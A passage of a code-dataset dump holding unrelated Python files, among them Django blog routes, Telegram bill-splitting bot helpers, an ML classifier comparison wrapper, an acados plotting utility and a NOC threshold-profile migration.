heappop\n\nEnvironment.step = step\n\n\n","sub_path":"shelf/simpypatch1.py","file_name":"simpypatch1.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"525052593","text":"from util import *\n\n\n@apply\ndef apply(given):\n n = given.of(Equal[Expr % 2, 0])\n return Equal((-1) ** n, 1)\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n# n = q * d + r\n n = Symbol(integer=True, given=True)\n\n Eq << apply(Equal(n % 2, 0))\n\n Eq << ~Eq[0]\n\n Eq << algebra.mod_ne_zero.imply.is_odd.apply(Eq[-1])\n\n Eq << algebra.is_odd.imply.eq.pow.apply(Eq[-1])\n\n Eq <<= Eq[-1] & Eq[1]\n\n\nif __name__ == '__main__':\n run()\n# created on 2019-10-10\n","sub_path":"axiom/algebra/is_even/given/eq.py","file_name":"eq.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529372979","text":"from django import template\n\nimport random\nimport markdown2\nimport string\n\nfrom minerals.models import Mineral\n\n\nregister = template.Library()\n\n\n@register.inclusion_tag('minerals/logo_header.html')\ndef logo_header():\n \"\"\"Displays the logo and header for the website\"\"\"\n return {}\n\n\n@register.inclusion_tag('minerals/random_mineral.html')\ndef random_mineral():\n return {\"mineral\": random.choice(Mineral.objects.all())}\n\n\n@register.filter('markdown_to_html')\ndef markdown_to_html(markdown_text):\n \"\"\"Converts markdown text to HTML\"\"\"\n html_body = markdown2.markdown(markdown_text)\n return html_body\n\n\n@register.inclusion_tag('minerals/alpha_nav.html')\ndef alpha_nav(current):\n alpha_list = [x for x in string.ascii_uppercase]\n return {'alpha_list': alpha_list, 'current': current}\n\n\n@register.inclusion_tag('minerals/group_nav.html')\ndef group_search(current):\n groups = [\n 'silicates',\n 'oxides',\n 'sulfates',\n 'sulfides',\n 'carbonates',\n 'halides',\n 'sulfosalts',\n 'phosphates',\n 'borates',\n 
'organic',\n 'arsenates',\n 'native',\n 'other']\n\n return {'groups': groups, 'current': current}\n\n\n\n","sub_path":"minerals/templatetags/mineral_extras.py","file_name":"mineral_extras.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619084291","text":"from django.conf.urls import url\nfrom . import views\nimport django.contrib.auth.views as djangoviews\n\n\nurlpatterns = [\n url(r'^$', views.post_list, name='post_list'),\n url(r'^post/(?P\\d+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P\\d+)/edit/$', views.post_edit, name='post_edit'),\n\n url(r'^post/(?P\\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'),\n url(r'^comment/(?P\\d+)/approve/$', views.comment_approve, name='comment_approve'),\n url(r'^comment/(?P\\d+)/remove/$', views.comment_remove, name='comment_remove'),\n\n url(r'^accounts/login/$', djangoviews.login, name='login'),\n url(r'^accounts/logout/$', djangoviews.logout, name='logout', kwargs={'next_page': '/'}),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62900722","text":"import os, shutil\r\n\r\nlistOfFiles = [] \r\nwith open(r'example\\Desktop\\list.txt') as listDocument:\r\n for row in listDocument:\r\n listOfFiles.append(row)\r\n\r\nfor root, dirs, files in os.walk(r'\\\\example\\directory\\images\\old'):\r\n for _file in files:\r\n if _file + '\\n' in listOfFiles:\r\n print\r\n 'Found file in: ' + str(root)\r\n shutil.copy(os.path.abspath(root + '/' + _file), r'\\\\example\\directory\\images\\new')\r\n else:\r\n print (\"file: {}\".format(_file))\r\n","sub_path":"FileCopy/copier.py","file_name":"copier.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"24015502","text":"from email.mime import text\nfrom datetime import *\nfrom google.cloud import vision\nimport pytz\nimport logging\nimport os\nfrom tokenize import String, group\nfrom .gcloudparser import GcloudParser\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\n\nfrom uuid import uuid4\nfrom telegram.utils.helpers import escape_markdown\nfrom telegram.ext import InlineQueryHandler, Updater, CommandHandler, CallbackQueryHandler, CallbackContext, Filters, MessageHandler\nfrom telegram import Chat, Message, Bot, InlineQueryResultArticle, ParseMode, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup, Update, replymarkup\n\nfrom .bot_sql_integration import *\n\n\nTOKEN = os.environ['API_TOKEN']\n# os.environ['GOOGLE_APPLICATION_CREDENTIALS']=r'gcloudkey.json'\ntz = pytz.timezone('Asia/Singapore')\nnow = datetime.now(tz) # the current time in your local timezone\n\ndef inlineQueryHelper(update):\n \"\"\"Helps to provide the display text for the inline query pop-up\"\"\"\n query =removeCrustFromString(update.inline_query.query)\n\n if len(query) > 44:\n return [\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=query + \" is too long for an order name.\",\n input_message_content=InputTextMessageContent(\n \"Trying to create order with invalid name: \" + query + \"\\n\\nPlease key in a valid order name to start splitting!\"\n ),\n 
thumb_url='https://res.cloudinary.com/jianoway/image/upload/b_rgb:ffffff/v1621962567/icons8-cross-mark-96_zrk1p9.png',\n ),\n ]\n\n if '\\n' in query or 'New Order:' in query:\n return [\n InlineQueryResultArticle(\n id=str(uuid4()),\n title=query + \" is not a valid order name.\",\n input_message_content=InputTextMessageContent(\n \"Trying to create order with invalid name: \" + query + \"\\n\\nPlease key in a valid order name to start splitting!\"\n ),\n thumb_url='https://res.cloudinary.com/jianoway/image/upload/b_rgb:ffffff/v1621962567/icons8-cross-mark-96_zrk1p9.png',\n ),\n ]\n\n return [\n InlineQueryResultArticle(\n id = str(uuid4()),\n title = \"Create new order: \" + query,\n input_message_content=InputTextMessageContent(\n \"New Order: \" + query\n ),\n thumb_url='https://res.cloudinary.com/jianoway/image/upload/b_rgb:ffffff/v1621962373/icons8-user-groups-100_nxolfi.png',\n )\n ]\n\ndef formatListOfUsernames(usernameList):\n str = ''\n for username in usernameList:\n str += '\\n@' + username\n return str\n\ndef waitingForUserToChooseSplitKeyboardMarkup():\n keyboard = [\n [\n InlineKeyboardButton(\"Unevenly\", callback_data=\"newordersplitunevenly\"),\n InlineKeyboardButton(\"Evenly\", callback_data=\"newordersplitevenly\")\n ]\n ]\n return InlineKeyboardMarkup(keyboard)\n\ndef splitEvenlyFinalisedKeyboardMarkup():\n keyboard = [\n [\n InlineKeyboardButton(\"I've paid!\", callback_data='debtorEvenlyPaid'),\n InlineKeyboardButton(\"I've not paid!\", callback_data='debtorEvenlyUnpaid')\n ],\n # [\n # InlineKeyboardButton(\"Mark as settled\", callback_data='markAsSettled')\n # ]\n ]\n return InlineKeyboardMarkup(keyboard)\n\ndef splitUnevenlyFinalisedKeyboardMarkup():\n keyboard = [\n [\n InlineKeyboardButton(\"I've paid!\", callback_data='debtorUnevenlyPaid'),\n InlineKeyboardButton(\"I've not paid!\", callback_data='debtorUnevenlyUnpaid')\n ],\n # [\n # InlineKeyboardButton(\"Mark as settled\", callback_data='markAsSettled')\n # ]\n ]\n return InlineKeyboardMarkup(keyboard)\n\ndef splitUnevenlyKeyboardMarkup(groupID, last):\n keyboardHolder = []\n buttonToFinalise = None\n\n if last:\n serviceChargeButton = InlineKeyboardButton(\"Service Charge?\", callback_data=\"servicechargecallbackdata\")\n GSTButton = InlineKeyboardButton(\"GST?\", callback_data=\"goodservicetax\")\n keyboardHolder.append([serviceChargeButton, GSTButton])\n buttonToFinalise = InlineKeyboardButton(\"Create Order\", callback_data='splitunevenlyfinalise')\n else:\n users = getAllUsersFromGroup(groupID)\n for user in users:\n firstname = getFirstName(user)\n username = getUsername(user)\n firstNameWithUsername = firstname + \" (@\" + username + \")\"\n callback_data = 'splitunevenlycallbackdata' + '%s' % user \n keyboardHolder.append([InlineKeyboardButton(firstNameWithUsername, callback_data=callback_data)])\n addEveryone = InlineKeyboardButton(\"Add Everyone!\", callback_data='splitunevenlyaddeveryonecallbackdata')\n \n keyboardHolder.append([addEveryone])\n buttonToFinalise = InlineKeyboardButton(\"Next Item\", callback_data='splitunevenlynextitem')\n \n keyboardHolder.append([buttonToFinalise])\n return InlineKeyboardMarkup(keyboardHolder)\n\n\ndef splitEvenlyKeyboardMarkup(groupID):\n keyboardHolder = []\n\n users = getAllUsersFromGroup(groupID)\n\n for user in users:\n firstname = getFirstName(user)\n username = getUsername(user)\n firstNameWithUsername = firstname + \" (@\" + username + \")\"\n callback_data = 'splitevenlycallbackdata' + '%s' % user\n 
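        # The target user's id rides inside callback_data as
        # "splitevenlycallbackdata<user_id>", and the callback handler
        # recovers it by stripping that prefix. Telegram caps
        # callback_data at 64 bytes, which this prefix-plus-id scheme
        # stays comfortably under.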
keyboardHolder.append([InlineKeyboardButton(firstNameWithUsername, callback_data=callback_data)])\n\n addEveryone = InlineKeyboardButton(\"Add Everyone!\", callback_data='splitevenlyaddeveryonecallbackdata')\n buttonToFinalise = InlineKeyboardButton(\"Create Order\", callback_data='SplitEvenlyFinalise')\n keyboardHolder.append([addEveryone])\n keyboardHolder.append([buttonToFinalise])\n\n return InlineKeyboardMarkup(keyboardHolder)\n \ndef receiptParser(url):\n client = vision.ImageAnnotatorClient()\n with BytesIO() as output:\n with Image.open(requests.get(\"%s\" % url, stream=True).raw) as img:\n img.save(output, 'BMP')\n content = output.getvalue()\n image = vision.Image(content = content)\n response = client.text_detection(image=image)\n parser = GcloudParser(debug=False)\n articles, dates, markets = parser.parse_response(response)\n formattedString = \"\"\n for article in articles:\n name = article[\"name\"]\n price = article[\"price\"]\n tempStr = \"%s - $%s\\n\" % (name, price)\n formattedString += tempStr\n return formattedString\n\n\ndef removeUUIDDashes(uuid):\n return \"\".join(str(uuid).split(\"-\"))\n\ndef removeUsernameFromDebtMessage(username, text):\n usernameWithTag = '@' + str(username)\n text = text\n if usernameWithTag in text:\n text = text.replace('\\n' + usernameWithTag, '', 1)\n return text\n\ndef addUsernameToDebtMessage(username, text):\n usernameWithTag = '@' + str(username)\n text = text\n if usernameWithTag not in text:\n text += '\\n' + usernameWithTag\n return text\n\ndef takeSecond(element):\n return element[1]\n\ndef formatTransactionsForCreditorKeyboardMarkup(transactions):\n if len(transactions) < 1:\n return\n print(transactions)\n \n firstTransaction = transactions[0]\n currentOrderID = firstTransaction[1]\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n keyboardHolder = []\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n\n for transaction in transactions:\n transactionID = transaction[0]\n transactionOrderID = transaction[1]\n if transactionOrderID != currentOrderID:\n currentOrderID = transactionOrderID\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n \n debtorID = transaction[2]\n amountOwed = getFormattedAmountFromString(transaction[3])\n debtorUsername = getUsername(debtorID)\n debtorName = getFirstName(debtorID)\n tempKeyboard = [\n InlineKeyboardButton('%s' % debtorName, callback_data='null'),\n InlineKeyboardButton('@%s' % debtorUsername, callback_data='null'),\n InlineKeyboardButton('$%s' % amountOwed, callback_data='null'),\n InlineKeyboardButton('Notify', callback_data=\"notifydebtorcallbackdata%s\" % transactionID),\n InlineKeyboardButton('Settle', callback_data=\"settledebtforcreditor%s\" % transactionID)\n ]\n keyboardHolder.append(tempKeyboard)\n \n return InlineKeyboardMarkup(keyboardHolder)\n\ndef formatTransactionsForDebtorKeyboardMarkup(transactions):\n 
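    # Mirror of formatTransactionsForCreditorKeyboardMarkup above: emits one
    # header row per order (name, date, group), then one row per transaction
    # showing the creditor's name, handle and the amount owed, plus a
    # "Settle" button. Transactions are assumed to arrive grouped by order
    # id, since a new header row is only emitted when the order id changes.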
\n if len(transactions) < 1:\n return\n \n firstTransaction = transactions[0]\n currentOrderID = firstTransaction[1]\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n keyboardHolder = []\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n for transaction in transactions:\n transactionID = transaction[0]\n transactionOrderID = transaction[1]\n if transactionOrderID != currentOrderID:\n currentOrderID = transactionOrderID\n currentGroupID = getGroupIDFromOrder(currentOrderID)\n currentGroupName = getGroupNameFromGroupID(currentGroupID)\n date = getOrderDateFromOrderID(currentOrderID)\n formattedDate = date.strftime(\"%d %B %Y\")\n currentOrderName = getOrderNameFromOrderID(currentOrderID)\n keyboardHolder.append([InlineKeyboardButton('Order: %s %s (%s)' % (currentOrderName, formattedDate, currentGroupName), callback_data='null')])\n \n creditorID = transaction[2]\n amountOwed = getFormattedAmountFromString(transaction[3])\n creditorUsername = getUsername(creditorID)\n creditorName = getFirstName(creditorID)\n tempKeyboard = [\n InlineKeyboardButton('%s' % creditorName, callback_data='null'),\n InlineKeyboardButton('@%s' % creditorUsername, callback_data='null'),\n InlineKeyboardButton('$%s' % amountOwed, callback_data='null'),\n InlineKeyboardButton('Settle', callback_data=\"settledebtfordebtor%s\" % transactionID)\n ]\n keyboardHolder.append(tempKeyboard)\n \n return InlineKeyboardMarkup(keyboardHolder)\n\ndef removeCrustFromString(str):\n return str.rstrip().lstrip()\n\ndef isValidAmount(amt):\n temp = amt.replace('.', '', 1)\n if len(temp) < 1:\n return False\n else:\n if temp[0] == '$':\n temp = temp.replace('$', '', 1)\n return temp.isdigit()\n\ndef getFormattedAmountFromString(amt):\n newAmt = amt\n if isinstance(newAmt, str):\n newAmt = newAmt.replace(\"$\", \"\", 1)\n tempAmt = float(float(newAmt) + float(0.005))\n strAmt = str(tempAmt)\n decimalPosition = strAmt.find('.')\n temp = list(strAmt)\n strToReturn = ''\n if float(strAmt) == 0:\n return '0.00'\n if decimalPosition == -1:\n for digit in temp:\n if digit == '0' and strToReturn == '':\n continue\n else:\n strToReturn = strToReturn + digit\n strToReturn = strToReturn + '.00'\n else:\n counter = -1\n for digit in temp:\n counter += 1\n if counter > decimalPosition + 2:\n return strToReturn\n if digit == '0' and strToReturn == '' and counter != decimalPosition - 1:\n continue\n else:\n strToReturn = strToReturn + digit\n if counter == decimalPosition + 1:\n strToReturn = strToReturn + '0'\n if strToReturn.endswith('.'):\n strToReturn = strToReturn + '00'\n return strToReturn\n\ndef itemListToString(itemList):\n listStr = ''\n for item in itemList:\n print(item)\n listStr += '\\n' + item[0] + ' ('\n listStr += '$' + item[1] + ')'\n return listStr \n\n# removeUsernameFromSplitAllEvenlyDebtMessage('testuser1', '6a39016c-cd25-11eb-955c-acde48001122')\nclass Order:\n def __init__(self, orderID, groupID, orderName, orderAmount, creditorID, date):\n self.orderID = orderID\n self.groupID = groupID\n self.orderName = orderName\n self.orderAmount = orderAmount\n self.creditorID = creditorID\n self.date = date\n\nclass UsersAndSplitAmount:\n def __init__(self, users, splitAmount):\n self.users = users\n self.splitAmount = 
splitAmount\n \nclass Transaction:\n def __init__(self, transaction_id, orderID, splitAmount, creditorID, userID):\n self.transaction_id = transaction_id\n self.orderID = orderID,\n self.splitAmount = splitAmount\n self.creditorID = creditorID\n self.userID = userID\n\n","sub_path":"HELPME/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":13629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"236323069","text":"import abc\r\nfrom onepiecepredictor.MultiModelsPredictor import MultiModelsPredictor\r\nfrom onepiecepredictor.OnePieceClassifier import OnePieceClassifier\r\n\r\nclass MultiModelsClassifier(MultiModelsPredictor):\r\n \"\"\"\r\n For Comparing multiple classification models performance with cross validation and stratified splitting of data if required.\r\n\r\n X -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n Y -> array-like(supported by Sklearn). If testTrainSplit is passed, this will be split into train and test\r\n testX -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n testY -> array-like(supported by Sklearn), test data. Ignored if testTrainSplit is passed\r\n testTrainSplit -> float, ratio passed will be the amount of test data.\r\n stratify -> bool, used to perform stratified splitting. If passed data will be split based on Y.\r\n performCV -> bool, Used when hyperParams not passed to perform plain CV.\r\n folds -> int, No of folds to be used for CV.\r\n applySmote -> bool, To apply smote to oversample the data. Pass only one of applySmote or underSample\r\n underSample -> bool, To randomly undersample the majority data.\r\n sampling -> str, Values supported by SMOTE, RandomUnderSampler classes in imblearn library.\r\n scoring -> str, Evaluation metric. Currently supported values: accuracy,balanced_accuracy,f1,precision,recall,roc_auc. If not passed accuracy is used.\r\n targetEncodeCols -> List. 
List of columns to target encode.\r\n multiClass -> Pass true in case of multiclass classification.\r\n \"\"\"\r\n\r\n def __init__(self, X, Y, testX = None, testY = None,testTrainSplit = None,\r\n folds = 5, scoring = None, performCV = None, targetEncodeCols = None,\r\n applySmote=False, underSample=False, sampling=None, stratify=None, multiClass = False\r\n ):\r\n self.multiClass = multiClass\r\n self.applySmote = applySmote\r\n self.sampling = sampling\r\n self.stratify = stratify\r\n self.underSample = underSample\r\n super().__init__(X=X, Y=Y, testX=testX, testY=testY, testTrainSplit=testTrainSplit,\r\n folds=folds, scoring=scoring, performCV=performCV, targetEncodeCols=targetEncodeCols\r\n )\r\n\r\n def predict(self):\r\n \"\"\"\r\n Returns dictionary with keys as Models and Values as metric scores.\r\n \"\"\"\r\n dummyRef = OnePieceClassifier(X = self.X, Y = self.Y, model = \"LOGISTIC\", modelParams = None,testTrainSplit = self.testTrainSplit,\r\n testX = self.testX, testY = self.testY,folds = self.folds, scoring = self.scoring, performCV = self.performCV,\r\n targetEncodeCols = self.targetEncodeCols, applySmote = self.applySmote, underSample = self.underSample,\r\n sampling = self.sampling, stratify = self.stratify, multiClass = self.multiClass)\r\n\r\n tempX = dummyRef.trainX\r\n tempY = dummyRef.trainY\r\n tempTestX = dummyRef.testX\r\n tempTestY = dummyRef.testY\r\n\r\n classifiers = [\"LOGISTIC\",\"RF\",\"SVM\",\"KNN\",\"ADABOOST\",\"XGBOOST\",\"CATBOOST\"]\r\n resultsDict = {}\r\n for classifier in classifiers:\r\n op = OnePieceClassifier(X = tempX, Y = tempY, model = classifier, modelParams = None, testTrainSplit = None,\r\n testX = tempTestX, testY = tempTestY, folds = self.folds, scoring = self.scoring, performCV = self.performCV,\r\n targetEncodeCols = None, applySmote = False, underSample = False,\r\n sampling = None, stratify = False, multiClass = self.multiClass)\r\n\r\n op.fit()\r\n score, preds = op.predict()\r\n resultsDict[classifier] = score\r\n\r\n del op\r\n\r\n return resultsDict\r\n\r\n\r\n\r\n","sub_path":"build/lib/onepiecepredictor/MultiModelsClassifier.py","file_name":"MultiModelsClassifier.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356941712","text":"#\n# Copyright (c) The acados authors.\n#\n# This file is part of acados.\n#\n# The 2-Clause BSD License\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.;\n#\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom acados_template import latexify_plot\n\n\ndef plot_pendulum(shooting_nodes, u_max, U, X_true, X_est=None, Y_measured=None, latexify=False, plt_show=True, X_true_label=None):\n \"\"\"\n Params:\n shooting_nodes: time values of the discretization\n u_max: maximum absolute value of u\n U: arrray with shape (N_sim-1, nu) or (N_sim, nu)\n X_true: arrray with shape (N_sim, nx)\n X_est: arrray with shape (N_sim-N_mhe, nx)\n Y_measured: array with shape (N_sim, ny)\n latexify: latex style plots\n \"\"\"\n\n if latexify:\n latexify_plot()\n\n WITH_ESTIMATION = X_est is not None and Y_measured is not None\n\n N_sim = X_true.shape[0]\n nx = X_true.shape[1]\n\n Tf = shooting_nodes[N_sim-1]\n t = shooting_nodes\n\n Ts = t[1] - t[0]\n if WITH_ESTIMATION:\n N_mhe = N_sim - X_est.shape[0]\n t_mhe = np.linspace(N_mhe * Ts, Tf, N_sim-N_mhe)\n\n plt.subplot(nx+1, 1, 1)\n line, = plt.step(t, np.append([U[0]], U))\n if X_true_label is not None:\n line.set_label(X_true_label)\n else:\n line.set_color('r')\n\n plt.ylabel('$u$')\n plt.xlabel('$t$')\n plt.hlines(u_max, t[0], t[-1], linestyles='dashed', alpha=0.7)\n plt.hlines(-u_max, t[0], t[-1], linestyles='dashed', alpha=0.7)\n plt.ylim([-1.2*u_max, 1.2*u_max])\n plt.xlim(t[0], t[-1])\n plt.grid()\n\n\n states_lables = ['$x$', r'$\\theta$', '$v$', r'$\\dot{\\theta}$']\n\n for i in range(nx):\n plt.subplot(nx+1, 1, i+2)\n line, = plt.plot(t, X_true[:, i], label='true')\n if X_true_label is not None:\n line.set_label(X_true_label)\n\n if WITH_ESTIMATION:\n plt.plot(t_mhe, X_est[:, i], '--', label='estimated')\n plt.plot(t, Y_measured[:, i], 'x', label='measured')\n\n plt.ylabel(states_lables[i])\n plt.xlabel('$t$')\n plt.grid()\n plt.legend(loc=1)\n plt.xlim(t[0], t[-1])\n\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, hspace=0.4)\n\n if plt_show:\n plt.show()\n","sub_path":"examples/acados_python/getting_started/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"626860931","text":"# ----------------------------------------------------------------------\n# Migrate SLAProfile threshold profiles\n# ----------------------------------------------------------------------\n# Copyright (C) 2007-2019 The NOC Project\n# See LICENSE for details\n# ----------------------------------------------------------------------\n\n# Python modules\nimport itertools\nimport operator\n\n# Third-party modules\nimport bson\nimport cachetools\n\n# NOC modules\nfrom noc.core.mongo.connection import get_db\nfrom noc.core.migration.base import BaseMigration\n\nSAVE_FIELDS = {\"_id\", \"metric_type\", \"enable_periodic\", \"enable_box\", \"is_stored\"}\n\n\nclass Migration(BaseMigration):\n _ac_cache = cachetools.TTLCache(maxsize=5, ttl=60)\n\n def migrate(self):\n current = itertools.count()\n db = self.mongo_db\n # Migrate profiles\n p_coll = 
db[\"noc.sla_profiles\"]\n tp_coll = db[\"thresholdprofiles\"]\n for doc in p_coll.find():\n metrics = doc.get(\"metrics\") or []\n changed = [m for m in metrics if self.has_thresholds(m)]\n if not changed and metrics:\n for metric in metrics:\n for f in set(metric) - SAVE_FIELDS:\n del metric[f]\n elif not changed:\n continue\n for n, metric in enumerate(changed):\n tp_id = bson.ObjectId()\n if metric.get(\"threshold_profile\"):\n # Extend existent threshold profile\n tp = tp_coll.find_one({\"_id\": metric[\"threshold_profile\"]})\n assert tp, \"Broken threshold profile\"\n tp[\"_id\"] = tp_id\n else:\n tp = {\"_id\": tp_id}\n # Fill profile\n tp[\"name\"] = \"sp-%05d-%03d\" % (next(current), n)\n tp[\"description\"] = \"Migrated for SLA profile '%s' metric '%s'\" % (\n doc[\"name\"],\n metric[\"metric_type\"],\n )\n tp[\"window_type\"] = metric.get(\"window_type\")\n tp[\"window\"] = metric.get(\"window\")\n tp[\"window_function\"] = metric.get(\"window_function\")\n tp[\"window_config\"] = metric.get(\"window_config\")\n # Build thresholds\n tp[\"thresholds\"] = []\n if metric.get(\"high_error\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \">=\",\n \"value\": metric[\"high_error\"],\n \"clear_op\": \"<\",\n \"clear_value\": metric[\"high_error\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | High Error\"),\n }\n ]\n if metric.get(\"low_error\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \"<=\",\n \"value\": metric[\"low_error\"],\n \"clear_op\": \">\",\n \"clear_value\": metric[\"low_error\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | Low Error\"),\n }\n ]\n if metric.get(\"low_warn\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \"<=\",\n \"value\": metric[\"low_warn\"],\n \"clear_op\": \">\",\n \"clear_value\": metric[\"low_warn\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | Low Warning\"),\n }\n ]\n if metric.get(\"high_warn\", False):\n tp[\"thresholds\"] += [\n {\n \"op\": \">=\",\n \"value\": metric[\"high_warn\"],\n \"clear_op\": \"<\",\n \"clear_value\": metric[\"high_warn\"],\n \"alarm_class\": self.get_alarm_class_id(\"NOC | PM | High Warning\"),\n }\n ]\n # Save profile\n tp_coll.insert_one(tp)\n #\n metric[\"threshold_profile\"] = tp_id\n # Store back\n p_coll.update_one({\"_id\": doc.pop(\"_id\")}, {\"$set\": doc})\n\n @staticmethod\n def has_thresholds(metric):\n return (\n metric.get(\"low_error\", False)\n or metric.get(\"low_warn\", False)\n or metric.get(\"high_warn\", False)\n or metric.get(\"high_error\", False)\n or metric.get(\"threshold_profile\")\n )\n\n @classmethod\n @cachetools.cachedmethod(operator.attrgetter(\"_ac_cache\"))\n def get_alarm_class_id(cls, name):\n db = get_db()\n ac_coll = db[\"noc.alarmclasses\"]\n return ac_coll.find_one({\"name\": name}, {\"_id\": 1})[\"_id\"]\n","sub_path":"sla/migrations/0002_thresholdprofiles.py","file_name":"0002_thresholdprofiles.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"174024908","text":"# Imports\n# ==================================================\nfrom sys import exit\n\n\n# Class\n# ==================================================\nclass DefineApplication:\n # PRIVATE\n def __get_user_input( self, message ):\n input_answer = ''\n\n while True:\n try:\n input_answer = str( input( message + \" (t / f): \" ) ).lower()\n print( '--------------------------------------------------\\n' )\n\n if input_answer == 't' or input_answer == 'f':\n break\n\n else:\n 
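                # Any answer other than a bare 't' or 'f' falls through to
                # this branch and re-prompts; the loop only exits on valid
                # input (or hard-exits on an unexpected exception).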
print( \"Please answer with t of f\\n\\n\" )\n continue\n\n except:\n print( \"Something went wrong...\" )\n exit()\n\n return input_answer\n\n\n # PUBLIC\n def define_program( self ):\n '''\n Return : list of bool values for steps to take\n --------------------------------------------------\n '''\n program_steps = []\n\n steps = [\n \"Generate barplot of most followed users by target profile's followers?\",\n \"Cluster followers based on who they follow and how they describe themselves?\"\n ]\n\n for step in steps:\n program_steps.append( self.__get_user_input( step ) )\n\n return program_steps","sub_path":"tweepy/explore_twitter_data/DefineApplication.py","file_name":"DefineApplication.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"375109419","text":"from random import randint\r\n\r\nA = [randint(0,10)]\r\nfor i in range(9):\r\n A.append(A[-1] + randint(0,10))\r\nprint(*A)\r\n\r\n\r\nlastEl = 0\r\ncurrLen = 1\r\ncurrDist = 0\r\n\r\ndistLook = {}\r\nfor i, a in enumerate(A):\r\n if i == 0: \r\n lastEl = a\r\n continue\r\n if i == 1: \r\n currLen = 2\r\n currDist = a - lastEl\r\n lastEl = a \r\n continue\r\n if (a - lastEl) != currDist:\r\n distLook.setdefault(currDist, [])\r\n distLook[currDist].append((i - currLen + 1, currLen))\r\n currLen = 2\r\n currDist = a - lastEl\r\n lastEl = a\r\n continue\r\n currLen += 1\r\n lastEl = a\r\n\r\ndistLook.setdefault(currDist, [])\r\ndistLook[currDist].append((i - currLen + 2, currLen))\r\nfor i in range(11):\r\n if i in distLook:\r\n print(i, distLook[i])\r\n\r\n\r\nfor q in range(10000):\r\n L = randint(1, 9)\r\n R = randint(L, 9)\r\n D = randint(0, 10)\r\n\r\n 